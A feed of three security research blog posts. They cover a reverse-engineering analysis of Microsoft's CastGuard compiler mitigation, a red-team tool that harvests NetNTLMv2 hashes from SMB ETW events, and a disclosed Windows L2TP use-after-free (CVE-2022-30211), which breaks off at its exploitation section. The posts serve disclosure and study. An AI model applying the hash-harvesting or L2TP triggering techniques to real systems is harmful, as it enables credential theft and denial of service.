Normal view

There are new articles available, click to refresh the page.
Before yesterdayNettitude Labs

Preventing Type Confusion with CastGuard

18 October 2023 at 08:00

Built into the Microsoft C++ compiler and runtime, CastGuard is a pivotal security enhancement designed to significantly reduce the number of exploitable Type Confusion vulnerabilities in applications. Joe Bialek gave a talk about CastGuard at BHUSA2022 (slides) that explains the overall goals of the feature, how it was developed, and how it works at a high level. This article offers a journey into my discovery CastGuard – delving into a technical evaluation of its mechanics, exploring illustrative examples, and highlighting relevant compiler flags.

While looking into new control flow guard feature support in the Windows PE load config directory a while back, I stumbled across a newly added field called CastGuardOsDeterminedFailureMode, added in Windows 21H2. I had never heard of CastGuard before so, naturally, I wondered what it did.

To give a brief overview, CastGuard is intended to solve Type Confusion problems such as the following:

struct Organism {
    virtual void Speak() { cout << "..."; }
}

struct Animal : public Organism {
    virtual void Speak() { cout << "Uh... hi?"; }
}

struct Dog : public Animal {
    virtual void Speak() { cout << "Woof!"; }
}

struct Cat : public Animal {
    virtual void Speak() { cout << "Meow!"; }
}

void SayMeow(Animal* animal) {
    static_cast<Cat*>(animal)->Speak();
}

Animal* dog = new Dog();
SayMeow(dog);

In this application, SayMeow will print “Woof!”, in a classic example of type confusion through an illegal downcast. The compiler is unable to infer that the Dog type being passed to SayMeow is a problem, because the function takes an Animal type, so no contract is broken there. The cast within SayMeow is also valid from the compiler’s perspective, because a Cat is an Animal, so it is entirely valid to downcast if you, the developer who wrote the code, know that the object being passed is in fact a Cat or a descendent type thereof. This is why this bug class is so pernicious – it’s easy to violate the type contract, especially in complex codebases.

Ordinarily this can be solved with dynamic_cast and RTTI, which tags each object with type information, but this has its own problems (see the talk linked above for full details) and it’s non-trivial to replace static_cast with dynamic_cast across a large codebase, especially in the case where your code has to coexist with 3rd party / user code (e.g. in the case of runtime libraries) where you can’t even enforce that RTTI is enabled. Furthermore, RTTI causes significant codegen bloat and performance penalties – a static cast is free (you’re interpreting the memory natively as if it were the type being cast to) whereas a dynamic cast with RTTI requires a handful of stores, loads, jumps, and calls on every cast.

CastGuard acts as an additional layer of protection against type confusion, or, more specifically, against cases where type confusion is the first-order memory vulnerability; it is not designed to protect against cases where an additional memory corruption issue is leveraged first. Its goal is to offer this protection with minimal codegen bloat and performance overhead, without modifying the (near-universally relied upon) ABI for C++ objects.

CastGuard leverages the fact that vftables (aka vtables) uniquely identify types. As long as the types on the left- and right-hand side of the cast have at least one vftable, and both types were declared within the binary being complied, the object types can be consistently and uniquely determined by their vftable address (with one caveat: comdat folding for identical vftables must be disabled in the linker). This allows the vftable pointer to be used as a unique type identifier on each object, avoiding the need for RTTI bloat and expensive runtime checks. Since an object’s vftable pointer is almost certainly being accessed around the same time as any cast involving that object, the memory being accessed is probably already in cache (or is otherwise about to benefit from being cached) so the performance impact of accessing that data is negligible.

Initially, Microsoft explored the idea of creating bitmaps that describe which types’ vftables are compatible with each other, so that each type that was observed to be down-cast to had a bitvector that described which of the other vftables were valid for casting. However, this turns out to be inefficient in a bunch of ways, and they came up with a much more elegant solution.

The type vftables are enumerated during link time code generation (LTCG). A type inheritance hierarchy is produced, and that hierarchy is flattened into a top-down depth-first list of vftables. These are stored contiguously in memory.

To use the above code as an example, if we assume that each vftable is 8 bytes in size, the CastGuard section would end up looking like this:

Offset Name
0x00 __CastGuardVftableStart
0x08 Organism::$vftable@
0x10 Animal::$vftable@
0x18 Dog::$vftable@
0x20 Cat::$vftable@
0x28 __CastGuardVftableEnd

Notice that parent types are always before child types in the table. Siblings can be in any order, but a sibling’s descendants would come immediately after it. For example, if we added a WolfHound class that inherited from Dog, its vftable would appear between Dog::$vftable@ and Cat::$vftable@ in the above table.

At any given static_cast<T> site the compiler knows how many other types inherit from T. Given that child types appear sequentially after the parent type in the CastGuard section, the compiler knows that there are a certain number of child type vftables appearing immediately afterward.

For example, Animal has two child types – Cat and Dog – and both of these types are allowed to be cast to Animal. So, if you do static_cast<Animal>(foo), CastGuard checks to see if foo’s vftable pointer lands within two vftable slots downward of Animal::$vftable@, which in this case would be any offset between 0x10 and 0x20 inclusively, i.e. the vftables of Animal, Dog, and Cat. These are all valid. If you try to cast an Organism object to the Animal type, CastGuard’s check detects this as being invalid because the Organism object vftable pointer is to offset 0x08, which is outside the valid range.

Looking back again at the example code, the cast being done is static_cast<Cat> on a Dog object. The Cat type has no descendants, so the range size of valid vftables is zero. The Cat type’s vftable, Cat::$vftable@, is at offset 0x20, whereas the Dog object vftable pointer points to offset 0x18, so it therefore fails the CastGuard range check. Casting a Cat object to the Cat type works, on the other hand, because a Cat object’s vftable pointer points to  0x20, which is within a 0 byte range of Cat::$vftable@.

This check is optimised even further by computing the valid range size at compile time, instead of storing the count of descendent types and multiplying that by the CastGuard vftable alignment size on every check. At each static cast site, the compiler simply subtracts the left-hand side type’s vftable address from the right-hand side object’s vftable pointer, and checks to see if it is less than or equal to the valid range. This not only reduces the computational complexity of each check, but it also means that the alignment of vftables within the CastGuard section can be arbitrarily decided by the linker on a per-build basis, based on the maximum vftable size being stored, without needing to include any additional metadata or codegen. In fact, the vftables don’t even need to be padded to all have the same alignment, as long as the compiler computes the valid range based on the sum of the vftable sizes of the child types.

I mentioned earlier that CastGuard only protects casts for types within the same binary. The CastGuard range check described above will always fail if a type from another binary is cast to a type from the current binary, because the vftable pointers will be out of range. This is obviously unacceptable – it’d break almost every program that uses types from a DLL – so CastGuard includes an extra compatibility check. This is where the __CastGuardVftableStart and __CastGuardVftableEnd symbols come in. If the vftable for an object being cast lands outside of the CastGuard section range, the check fails open and allows the cast because it is outside the scope of protection offered by the CastGuard feature.

This approach is much faster than dynamic casting with RTTI and adds very little extra bloat in the compiled binary (caveat: see the talk for details on where they had to optimise this a bit further for things like CRTP). As such, CastGuard is suitable to be enabled everywhere, including in performance-critical paths where dynamic casting would be far too expensive.

Pretty cool, right? I thought so too.

Let’s now go back to the original reason for me discovering CastGuard in the first place: the CastGuardOsDeterminedFailureMode field that was added to the PE load config structure in 21H2. It’s pretty clear that this field has something to do with CastGuard (the name rather gives it away) but it isn’t clear what the field actually does.

My first approach to figure this out was to enumerate every single PE file on my computer (and a Windows 11 Pro VM), parse it, and look for nonzero values in the CastGuardOsDeterminedFailureMode field. I found a bunch! This field is documented as containing a virtual address (VA). I wrote some code to parse out the CastGuardOsDeterminedFailureMode field from the load config, attempt to resolve the VA to an offset, then read the data at that offset.

I found three overall classes of PE file through this scan method:

  • PE files where the CastGuardOsDeterminedFailureMode field is zero.
  • PE files where the CastGuardOsDeterminedFailureMode field contains a valid VA which points to eight zero bytes in the .rdata section.
  • PE files where the CastGuardOsDeterminedFailureMode field contains what looks like a valid VA, but is in fact an invalid VA.

The third type of result is a bit confusing. The VA looks valid at first glance – it starts with the same few nibbles as other valid VAs – but it doesn’t point within any of the sections. At first I thought my VA translation code was broken, but I confirmed that the VAs were indeed invalid when translated by other tools such as CFF Explorer and PE-Bear. We’ll come back to this later.

I loaded a few of the binaries with valid VAs into Ghidra and applied debugging symbols. I found that these binaries contained a symbol named __castguard_check_failure_os_handled_fptr in the .rdata section, and that the CastGuardOsDeterminedFailureMode VA pointed to the address of this symbol. I additionally found that the binaries included a fast-fail code called FAST_FAIL_CAST_GUARD (65) which is used when the process fast-fails due to a CastGuard range check failure. However, I couldn’t find the __CastGuardVftableStart or __CastGuardVftableEnd symbols for the CastGuard vftable region that had been mentioned in Joe’s talk.

Searching for these symbol names online led me to pieces of vcruntime source code included in SDKs as part of Visual Studio. The relevant source file is guard_support.c and it can be found in the following path:

[VisualStudio]/VC/Tools/MSVC/[version]/crt/src/vcruntime/guard_support.c

It appears that the CastGuard feature was added somewhere around version 14.28.29333, and minor changes have been made in later versions.

Comments in this file explain how the table alignment works. As of 14.34.31933, the start of the CastGuard section is aligned to a size of 16*sizeof(void*), i.e. 128-byte aligned on 64-bit platforms and 64-byte aligned on 32-bit platforms.

There are three parts to the table, and they are allocated as .rdata subsections: .rdata$CastGuardVftablesA, .rdata$CastGuardVftablesB, and .rdata$CastGuardVftablesC.

Parts A and C store the __CastGuardVftablesStart and __CastGuardVftablesEnd symbols. Both of these are defined as a CastGuardVftables struct type that contains a padding field of the alignment size. This means that the first vftable in the CastGuard section is placed at __CastGuardVftablesStart + sizeof(struct CastGuardVftables).

Part B is generated automatically by the compiler. It contains the vftables, and these are automatically aligned to whatever size makes sense during compilation. If no vftables are generated, part B is essentially missing, and you end up with __CastGuardVftablesEnd placed 64/128 bytes after __CastGuardVftablesStart.

The guard_support.c code does not contain the CastGuard checks themselves; these are emitted as part of the compiler itself rather than being represented in a public source file. However, guard_support.c does contain the failure routines and the AppCompat check routine.

When a CastGuard check at a static_cast site fails, it calls into one of four failure routines:

  1. __castguard_check_failure_nop – does nothing.
  2. __castguard_check_failure_debugbreak – raises a breakpoint by calling __debugbreak()
  3. __castguard_check_failure_fastfail – fast-fails using __fastfail(FAST_FAIL_CAST_GUARD)
  4. __castguard_check_failure_os_handled – calls an OS handler function

Rather than calling the AppCompat check routine at every static_cast site, the check is instead deferred until a CastGuard check fails. Each of the check failure routines above, with the exception of nop, first calls into the AppCompat check routine to see if the failure should be ignored.

The AppCompat check routine is implemented in __castguard_compat_check, and it looks like this:

static
inline
BOOL
__cdecl __castguard_compat_check(PVOID rhsVftablePtr)
{
    ULONG_PTR realVftableRangeStart = (ULONG_PTR)&__CastGuardVftablesStart + sizeof(struct CastGuardVftables);
    ULONG_PTR realVftableRangeEnd = (ULONG_PTR)&__CastGuardVftablesEnd;
    ULONG_PTR vftableRangeSize = realVftableRangeEnd - realVftableRangeStart;

    return (ULONG_PTR)rhsVftablePtr - realVftableRangeStart <= vftableRangeSize;
}

This routine is responsible for checking whether the right-hand side (object being cast) vftable pointer is pointing somewhere between the first vftable in the CastGuard section and __CastGuardVftablesEnd. If it is, the AppCompat check returns true (i.e. this is a valid case that CastGuard should protect against), otherwise it returns false.

In the case of __castguard_check_failure_os_handled, the handler code looks like this:

extern
inline
void __cdecl __castguard_check_failure_os_handled(PVOID rhsVftablePtr)
{
    if (__castguard_compat_check(rhsVftablePtr))
    {
        __castguard_check_failure_os_handled_wrapper(rhsVftablePtr);
    }

    return;
}

If the AppCompat routine says that the failed check should be honoured, it calls an OS handler wrapper. The wrapper function looks like this:

static inline void
__declspec(guard(nocf))
__cdecl __castguard_check_failure_os_handled_wrapper(PVOID rhsVftablePtr)
{
    // This function is opted out of CFG because the OS handled function pointer
    // is allocated within ".00cfg" section. This section benefits from the same
    // level of protection as a CFG pointer would.

    if (__castguard_check_failure_os_handled_fptr != NULL)
    {
        __castguard_check_failure_os_handled_fptr(rhsVftablePtr);
    }
    return;
}

The __castguard_check_failure_os_handled_fptr function pointer being referred to here is the symbol that CastGuardOsDeterminedFailureMode points to in the load config table – the exact one I was trying to figure out the purpose of!

That function pointer is defined as:

__declspec(allocate(".00cfg"))
DECLSPEC_SELECTANY
VOID (* volatile __castguard_check_failure_os_handled_fptr)(PVOID rhsVftablePtr) = NULL;

The declspec is important here – it places __castguard_check_failure_os_handled_fptr in the same section as CFG/XFG pointers, which means (as the code comment above points out) that the OS handler function pointer is protected in the same way as the CFG/XFG pointers. Control flow from the CastGuard check site to the check failure function to the AppCompat check function can be protected by control flow guard, but flow from the failure routine to the OS handled function pointer cannot because its value is (presumably always) unknown at compile time. This is why the wrapper function above is required, with guard(nocf) applied – it disables CFG for the flow from the check failure function to the OS handler function, since CFG would likely disallow the indirect call, but since the pointer itself is protected it doesn’t actually matter.

This indicates that CastGuardOsDeterminedFailureMode is intended to be used to specify the location of the __castguard_check_failure_os_handled_fptr symbol, which in turn points to an OS handler function that is called when a check failure occurs.

None of this is documented but, given that Joe’s BHUSA2022 talk included an anecdote about Microsoft starting the CastGuard feature off in a report-only mode, I can only presume that CastGuardOsDeterminedFailureMode was designed to provide the binaries with this reporting feature.

At this point we still have a couple of open questions, though. First, how does the compiler pick between the four different failure handlers? Second, how are the CastGuard checks themselves implemented? And third, why do a lot of the binaries have invalid VAs in CastGuardOsDeterminedFailureMode?

To answer the first question, we have to take a look at c2.dll in the MSVC compiler, which is where CastGuard is implemented under the hood. This DLL contains a class called CastGuard which, unsurprisingly, is responsible for most of the heavy lifting. One of the functions in this class, called InsertCastGuardCompatCheck, refers to a field of some unknown object in thread-local storage and picks which of the four check functions to insert a call to based on that value:

Value Call
1 __castguard_check_failure_fastfail
2 __castguard_check_failure_debugbreak
3 __castguard_check_failure_os_handled
4 __castguard_check_failure_nop

From prior reverse engineering expeditions into the MSVC compiler, I remembered that config flags passed to the compiler are typically stored in a big structure in TLS. From there I was able to find the hidden compiler flags that enable CastGuard and control its behaviour.

Hidden flags can be passed to each stage of the compiler using a special /d command line argument. The format of the argument is /dN… where N specifies which DLL the hidden flag should be passed to (1 for the front-end compiler, c1.dll, or 2 for the code generator, c2.dll). The flag is then appended to the argument.

The known hidden compiler flags for CastGuard are:

Flag Description
/d2CastGuard- Disables CastGuard.
/d2CastGuard Enables CastGuard.
/d2CastGuardFailureMode:fastfail Sets the failure mode to fast-fail.
/d2CastGuardFailureMode:nop Sets the failure mode to nop.
/d2CastGuardFailureMode:os_handled Sets the failure mode to OS handled.
/d2CastGuardFailureMode:debugbreak Sets the failure mode to debug break.
/d2CastGuardOption:dump_layout_info Dumps the CastGuard layout info in the build output.
/d2CastGuardOption:force_type_system Forces type system analysis, even if the binary is too big for fast analysis.
This is intended to be used with the linker, rather than the compiler, so warning C5066 is raised if you pass it.
/d2CastGuardTestFlags:# Sets various test flags for the CastGuard implementation, as a bitwise numeric value. Hex numbers are valid.

So now we know how the different failure modes are set: at build time, with a compiler flag.

If we rebuild the example code with some extra compiler flags, we can try CastGuard out:

/d2CastGuard /d2CastGuardFailureMode:debugbreak /d2CastGuardOption:dump_layout_info

The compiler then prints layout information for CastGuard:

1>***** CastGuard Region ******
1>Offset:0x00000 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Dog@@6B@
1>
1>
1>***** CastGuard Compatibility Info ******
1>

When executed, the static cast in SayMeow has a CastGuard check applied and raises a debug break in __castguard_check_failure_debugbreak.

We can also learn a little more about CastGuard from the warnings and errors that are known to be associated with it, by looking at the string tables in the compiler binaries:

  • C5064: “CastGuard has been disabled because the binary is too big for fast type system analysis and compiler throughput will be degraded. To override this behavior and force enable the type system so CastGuard can be used, specify the flag /d2:-CastGuardOption:force_type_system to the linker.”
  • C5065: “The CastGuard subsystem could not be enabled.”
  • C5066: “CastGuardOption:force_type_system should not be passed to the compiler, it should only be passed to the linker via /d2:-CastGuardOption:force_type_system. Passing this flag to the compiler directly will force the type system for all binaries this ltcg module is linked in to.”
  • C5067: “CastGuard is not compatible with d2notypeopt”
  • C5068: “CastGuard is not compatible with incremental linking”
  • C5069: “CastGuard cannot initialize the type system. An object is being used that was built with a compiler that did not include the necessary vftable type information (I_VFTABLETIS) which prevents the type system from loading. Object: %s”
  • C5070: “CastGuard cannot initialize the type system. An object is being used that was built with a compiler that did not include the necessary type information (I_TIS) which prevents the type system from loading. Object: %s”
  • C5071: “CastGuard cannot initialize the type system. An error occurred while trying to read the type information from the debug il. Object: %s”

Digging even further into the implementation, it appears that Microsoft added a new C++ attribute called nocastguard, which can be used to exclude a type from CastGuard checks. Based on my experimentation, this attribute is applied to types (applying the attribute to an argument or variable causes a compiler crash!) and disables checks when a static cast is performed to that type.

Changing our example code to the following causes the CastGuard check to be eliminated, and the type confusion bug returns:

struct [[msvc::nocastguard]] Cat : Animal {
    virtual void Speak() { std::cout << "Meow!\n"; }
};

If nocastguard is applied to the Dog or Animal type instead, the CastGuard check returns and the type confusion bug is prevented. This indicates that, at least in this unreleased implementation, the attribute is specifically used to prevent CastGuard checks on casts to the target type.

This newly CastGuard-enabled development environment makes it easy to experiment and disassemble the binary and see what the code looks like. In the simplest version of our example program, the result is actually quite amusing: the program does nothing except initialise a Dog object and immediately unconditionally call the failure routine in main. This is because the CastGuard check is injected into the IL during the optimisation phase. You can see this in practice: turning off optimisations causes the CastGuard pass to be skipped entirely. Since the check is part of the IL, it is subject to optimisation passes. The optimiser sees that the check essentially boils down to if (Cat::$vftable@ != Dog::$vftable@) { fail; }, whose expression is always true, which results in the branch being taken and the entire rest of the code being eliminated. Since SayMeow is only called once, it gets inlined, and the entire program ends up as a call to the CastGuard failure routine. This implies that it could technically be possible for a future release to identify such a scenario at build time and raise an error or warning.

To study things a little better, let’s expand the program in a way that introduces uncertainty and tricks the compiler into not optimising the routines. (Note: we can’t turn off optimisations to avoid all the inlining and elimination because that also turns off CastGuard.)

int main()
{
    for (int i = 0; i < 20; i++)
    {
        int idx = rand() % 3;
        Animal* animal = nullptr;
        switch (idx)
        {
        case 0:
            std::cout << "Making an animal...\n";
            animal = new Animal();
            break;
        case 1:
            std::cout << "Making a dog...\n";
            animal = new Dog();
            break;
        default:
            std::cout << "Making a cat...\n";
            animal = new Cat();
            break;
        }
        SayMeow(animal);
    }
}

This results in a program with an entirely normal looking main function, with no references to CastGuard routines. SayMeow looks like the following:

void SayMeow(Animal *animal)
{
    if (animal != nullptr && *animal != Cat::$vftable@)
    {
        __castguard_check_failure_debugbreak((void*)*animal);
    }
    animal->Speak();
}

This is pretty much expected: *animal dereferences the passed pointer to get to the vftable for the object, and, since the Cat type has no descendent types, the range check just turns into a straight equality check.

To make things more interesting, let’s add a WolfHound type that inherits from Dog, and a function called SayWoof that works just like SayMeow but with a cast to Dog instead of Cat. We’ll also update main so that it can create an Animal, Cat, Dog, or WolfHound.

Upon building this new program, the compiler dumps the CastGuard layout:

***** CastGuard Region ******
Offset:0x00000 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Animal@@6B@
Offset:0x00010 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Dog@@6B@
Offset:0x00020 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7WolfHound@@6B@
Offset:0x00030 RTTIBias:0x8 Size:0x010 Alignment:0x08 VftableName:??_7Cat@@6B@

***** CastGuard Compatibility Info ******
Vftable:??_7Dog@@6B@ RangeCheck ComparisonBaseVftable:??_7Dog@@6B@ Size:0x10 ObjectCreated
    CompatibleVftable: Offset:0x00010 RTTIBias:0x8 Vftable:??_7Dog@@6B@
    CompatibleVftable: Offset:0x00020 RTTIBias:0x8 Vftable:??_7WolfHound@@6B@

We can see that the WolfHound vftable is placed immediately after the Dog vftable, and that the Dog type is compatible with the Dog and WolfHound types. We can also see that the size of the range check is 0x10, which makes sense because WolfHound‘s vftable comes 0x10 bytes after Dog‘s vftable.

The CastGuard check in SayWoof now ends up looking something like this:

void SayWoof(Animal* animal)
{
    if (animal != nullptr)
    {
        if (*animal - Dog::$vftable@ > 0x10)
        {
            __castguard_check_failure_debugbreak((void*)*animal);
        }
    }
    animal->Speak();
}

Let’s enumerate the possible flows here:

  • If the type being passed is Dog, then *animal is equal to Dog::$vftable@, which makes *animal - Dog::$vftable@ equal zero, so the check passes.
  • If the type being passed is WolfHound, then *animal is equal to WolfHound::$vftable@, which is positioned 0x10 bytes before Dog::$vftable@. As such, *animal - Dog::$vftable@ will equal 0x10, and the check passes.
  • If the type being passed is Cat, then *animal is equal to Cat::$vftable@, which makes *animal - Dog::$vftable@ equal 0x20, and the check fails.
  • If the type being passed is Animal, then *animal is equal to Animal::$vftable@. Since Animal::$vftable@ is positioned before Dog::$vftable@ in the table, the result of the unsigned subtraction will wrap, causing the result to be greater than 0x10, and the check fails.

This shows CastGuard in action quite nicely!

For completeness, let’s go back and wrap up a small loose end relating to the hidden compiler flags: test flags. The /d2CastGuardTestFlags option takes a hexadecimal number value representing a set of bitwise flags. The test flags value is written to a symbol called CastGuardTestFlags inside c2.dll, and this value is used in roughly ten different locations in the code as of version 14.34.31933.

In the process of reverse engineering this code, I discovered that four separate check approaches are implemented – RangeCheck (0x01, the default), ROLCheck (0x02), ConstantBitmapCheck (0x03), and BitmapCheck (0x04) – presumably following the sequence of approaches and optimisations that were mentioned in the talk.

Here’s what I was able to figure out about these flags:

Flag Value Notes
0x01 Switches the check type to ROLCheck (0x02), as long as neither 0x02 nor 0x40 are also set.
0x02 Switches the check type to ConstantBitmapCheck (0x03), as long as 0x40 is not also set.
0x04 Appears to enable an alternative strategy for selecting the most appropriate vftable for a type with multiple inheritance.
0x08 Forces CastGuard::IsCastGuardCheckNeeded to default to true instead of false when no condition explicitly prevents a check, which appears to force the generation of CastGuard checks even if a codegen pass was not performed.
0x10 Forces generation of metadata for all types in the inheritance tree. Types that are never part of a cast check, either as a cast target or valid source type, do not normally end up as part of the CastGuard section. For example, Organism is ignored by CastGuard in our example programs because it never ends up being relevant at a static cast site. When this flag is enabled, all types in the inheritance tree are treated as relevant, and their vftables are placed into the CastGuard section. A type which is never part of a static cast, and whose parent and child types (if there are any) are never part of a static cast, are still kept separate and don’t end up in the CastGuard section.
0x20 Exact behaviour is unclear, but it seems to force the CastGuard subsystem to be enabled in a situation where error C5065 would be otherwise raised, and forces the TypeSystem::Builder::ProcessILRecord function to continue working even if an internal boolean named OneModuleEnablesCastGuard is false.
0x40 Switches the check type to BitmapCheck (0x04) and, if /d2CastGuardOption:dump_layout_info is also set, prints the bitmap in the build output.

The three alternative check patterns function exactly as was explained in the BHUSA2022 talk, so I won’t go into them any further.

Unless I missed anything, we appear to be down to just one final question: why am I seeing invalid VAs in CastGuardOsDeterminedFailureMode on a bunch of Windows executables?

At first I thought that there might be some kind of masking going on, with certain bits guaranteed to be zero in the VA due to alignment requirements, with those bit positions being reused to set or indicate the failure mode or check type. This doesn’t make much sense, though, and I can find no supporting evidence. It appears that this is a bug from an earlier implementation of CastGuard, when Microsoft were trialling rolling out notify-only protection on certain components. I couldn’t concretely confirm this theory, but I did manage to have a quick chat with someone who worked on the feature, and they were as surprised to see the invalid VAs as I was.

It takes time to get these compiler-level bug class mitigations implemented correctly. The analysis in this article was originally performed in February 2023, but CastGuard remains unofficial and undocumented as of October 2023. Given the unfathomable quantity of existing code that interacts with COM interfaces, all of which might be affected by this feature, and the politically fractious intersection between C++ language standards and implementation-specific language features, it isn’t particularly surprising that it’s taking Microsoft a while to roll this mitigation out.

The post Preventing Type Confusion with CastGuard appeared first on LRQA Nettitude Labs.

ETWHash – “He who listens, shall receive”

3 May 2023 at 10:58

ETWHash is a small C# tool used during Red Team engagements, that can consume ETW SMB events and extract NetNTLMv2 hashes for cracking offline, unlike currently documented methods.

github GitHub: https://github.com/nettitude/ETWHash

Microsoft ETW (Event Tracing for Windows) is a logging mechanism integrated into the Windows operating system that enables the generation of diagnostic and tracing messages by applications. These messages can be captured and analysed by security professionals or system administrators for various purposes, including debugging and performance analysis. Although ETW is mainly used for defensive applications, offensive security research took great interest in bypassing the offered visibility. However, as demonstrated in this short article, ETW can also be a great resource for offense, finding providers useful for passive situational awareness.

Instrumenting Your Code with ETW | Microsoft Learn

Numerous resources are available on ETW, detailing its applications in both offensive and defensive contexts. One particularly insightful resource is “Tampering with Windows Event Tracing: Background, Offense, and Defense“. The article provides a comprehensive guide to ETW, which gives all the necessary information to get up to speed.

While researching potential offensive uses for ETW, a presentation by CyberPoint at Ruxcon 2016 revealed a unique approach to utilizing ETW for information leakage and keylogging. The released POC code can be found here. The presentation sparked further interest in exploring ETW’s potential applications during Red Team engagements, leading to the discovery of a few interesting ETW providers.

The following tools are useful in exploring ETW providers.

By utilizing WEPExplorer, all available ETW providers on the test system were listed, and the Microsoft-Windows-SMBServer provider {D48CE617-33A2-4BC3-A5C7-11AA4F29619E} quickly drew attention.

Graphical user interface, text, application, email Description automatically generated

The provider exposes a large number of fields related to SMB operations of the host. An easy way to identify all the available fields of an ETW provider is by viewing the manifest of the ETW provider, which describes all the events that are supported. The manifest can be extracted using Microsoft’s Perfview:

PerfView userCommand DumpRegisteredManifest Microsoft-Windows-SMBServer

Graphical user interface, text, application Description automatically generated

After a few hours inspecting the fields and generating SMB events to understand the logging, the field PACKETBYTES was observed to be updated every time an SMB authentication attempt occurred. The immediate next step was to dump the entire byte array to see what it contained.

Graphical user interface, text, application Description automatically generated

A picture containing text Description automatically generated

The array as it can be seen, contained the null-terminated ASCII “NTLMSSP” string (0x4e544c4d53535000) which is part of the NTLM authentication message headers. If you want to read up more on the NTLM authentication protocol, “The NTLM Authentication Protocol and Security Support Provider” is an excellent resource.

It immediately became evident that the provider was logging all SMB packets, including the full NetNTLMv2 challenge response. Shortly thereafter, a proof-of-concept (POC) was developed that would create a new Trace Session in order to consume the events of the Microsoft-Windows-SMBServer provider, and upon the occurrence of the event 40000, would extract the NetNTLMv2 challenge response hash from the packet bytes.

Text Description automatically generated

Microsoft was contacted via MSRC and confirmed that this is intended behaviour, as it requires administrative privileges on the host.

We believe that ETW is great mechanism already leveraged extensively for defensive purposes, still having untapped potential for offensive usage. Interesting ideas for further exploitation might be:

  • Using ETW as an interprocess transfer channel
  • Using ETW to monitor / identify deceptive technologies
  • Using ETW to have situational awareness of services / processes / network connections / reboots

Maybe we should start listening more to ETW instead of disabling it 😉

The post ETWHash – “He who listens, shall receive” appeared first on LRQA Nettitude Labs.

CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability

17 August 2022 at 09:00

Nettitude discovered a Memory Leak turned Use after Free (UaF) bug in the Microsoft implementation of the L2TP VPN protocol. The vulnerability affects most server and desktop versions of Windows, dating back to Windows Server 2008 and Windows 7 respectively. This could result in a Denial of Service (DoS) condition or could potentially be exploited to achieve Remote Code Execution (RCE).

Please see the official Microsoft advisory for full details:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30211

L2TP is a relatively uncommonly used protocol and sits behind an IPSEC authenticated tunnel by default, making the chances of seeing this bug in the wild extremely low. Despite the low likelihood of exploitation, analysis of this bug demonstrates interesting adverse effects of code which was designed to actually mitigate security risk.

L2TP and IPSEC

The default way to interact with an L2TP VPN on Windows Server is by first establishing an IPSEC tunnel to encrypt the traffic. For the purposes of providing a minimalistic proof of concept, I tested against Windows Server with the IPSEC tunnelling layer disabled, interacting directly with the L2TP driver. Please note however, it is still possible to trigger this bug over an IPSEC tunnelled connection.

For curious readers, disabling IPSEC can be achieved by setting the ProhibitIpSec DWORD registry key with a value of 1 under the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters\

This will disable IPSEC tunnelling and allow L2TP to be interacted with directly over UDP. Not to discourage a full IPSEC + L2TP solution, but it does make testing the L2TP driver a great deal easier!

Vulnerability Details

The bug in question is a reference increment bug located in the rasl2tp.sys L2TP VPN protocol driver, and relates to how tunnel context structures are reused. Each established tunnel for a connection is allocated a context structure, and a unique tunnel is considered to be the pairing of both a unique tunnel ID and UDP + IP address.

When a client initiates an L2TP StartControlConnectionRequest for a tunnel ID that they have previously used on a source IP and port that the server has already seen, the rasl2tp driver will attempt to reuse a previously allocated structure as long as it is not in an unusable state or already freed. This functionality is handled by the SetupTunnel function when a StartControlConnectionRequest is made with no tunnel or session ID specified in the L2TP Header, and an assigned tunnel ID matching one that has already been used.

Pseudo code for the vulnerable section is as follows:

if ( !lpL2tpHeaderHasTunnelID )
{
   // Tunnel Lookup function uses UDP address information as well as TunnelID to match a previous Tunnel Context structure
   NewTunnel = TunnelCbFromIpAddressAndAssignedTunnelId(lpAdapterCtx, lpSockAddr, lpTunnelId);
   if ( NewTunnel ) // if a match is found a pointer is returned else the return is NULL
   {
      if...
      ReferenceTunnel(NewTunnel, 1); // This is the vulnerable reference count
      KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
      return NewTunnel;
   }
}

The issue is that the reference count does not have an appropriate dereference anywhere in the code. This means that it is possible for a malicious client to continually send StartControlConnectionRequests to increment the value indefinitely.

This creates two separate vulnerable conditions. Firstly, because the reference count can be far greater than it should be, it is possible for an attacker to abuse the issue to exhaust the memory resources of the server by spoofing numerous IP address and tunnel ID combinations and sending several StartControlConnectionRequests. This would keep the structures alive indefinitely until the server’s resources are exhausted, causing a denial of service. This process can be amplified across many nodes to accelerate the process of consuming server resources and is only limited by the bandwidth capacity of the server. In reality, this process may also be limited by other factors applied to network traffic before the L2TP protocol is handled.

The second vulnerable condition is due to logic in the DereferenceTunnel function responsible for removing tunnel references and initiating the underlying free operation. It is possible to turn this issue into a Use after Free (UaF) vulnerability, which could potentially then be used to achieve Remote Code Execution.

Some pseudo code for the logic that allows this to happen in the DereferenceTunnel function is as follows:

__int64 __fastcall DereferenceTunnel(TunnelCtx *TunnelCtx)
{
   ...

   lpAdapterCtx = TunnelCtx->AdapterCtx;
   lpTunnelCtx = TunnelCtx;
   lpAdapterCtx->TunnelCurIRQL = KeAcquireSpinLockRaiseToDpc(&lpAdapterCtx->TunnelLock);
   RefCount = --lpTunnelCtx->TuneelRefCount;
   if ( !RefCount )
   {
      // This code path properly removes the Tunnel Context from a global linked list and handles state termination
      ...
   }
   KeReleaseSpinLock(&lpAdapterCtx->TunnelLock, lpAdapterCtx->TunnelCurIRQL);
   if ( RefCount > 0 ) // This line is vulnerable to a signed integer overflow
      return (unsigned int)RefCount;
   ...
   lpTunnelCtx->TunnelTag = '0T2L';
   ExFreePoolWithTag(&lpTunnelCtx[-1].TunnelVcListIRQL, 0);
   ...
   return 0i64;
}

The second check of the reference count that would normally cause the function to return uses a signed integer for the reference count variable. This means using the reference increment bug we can cause the reference count value to overflow and become a negative number. This would cause the DereferenceTunnel function to free the target tunnel context structure without removing it from the global linked list.

The global linked list in question is used to store all the active tunnel context structures. When a UDP packet is handled, this global linked list is used to lookup the appropriate tunnel structure. If a freed structure was still present in the list, any UDP packet referencing the freed context structure’s ID would be able to gain access to the freed structure and could be used to further corrupt kernel memory.

Exploitation

